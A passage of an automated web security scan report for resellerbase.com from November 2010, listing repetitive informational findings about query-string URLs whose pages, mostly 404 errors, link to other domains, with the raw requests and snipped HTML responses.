Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.92. http://www.resellerbase.com/communication/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://worldkom.net/reseller
http://www.mediaplazza.com/sysMaster.php?a=movil24
http://www.telebay.com/0815

Request

GET /communication/search.php?cat=8&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:39:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 29778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.telebay.com/0815" name="link_10"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.telebay.com/0815" name="link_10"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://worldkom.net/reseller" name="link_16"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://worldkom.net/reseller" name="link_16"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.mediaplazza.com/sysMaster.php?a=movil24" name="link_29"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.93. http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.94. http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.95. http://www.resellerbase.com/communication/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.96. http://www.resellerbase.com/communication/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

6.97. http://www.resellerbase.com/communication/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/communication/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/communication/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /communication/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.98. http://www.resellerbase.com/detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail.php?id=555-555-0199@example.com

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail.php?id=555-555-0199@example.com HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php?id=555-555-0199@example.com&pflag=view&submit=Submit
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.99. http://www.resellerbase.com/detail/10/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/10/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.100. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.101. http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/10/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.102. http://www.resellerbase.com/detail/10/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/10/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.103. http://www.resellerbase.com/detail/10/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/10/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.104. http://www.resellerbase.com/detail/11/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/11/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/11/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.105. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.106. http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.107. http://www.resellerbase.com/detail/11/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/11/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.108. http://www.resellerbase.com/detail/11/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/11/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /detail/11/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
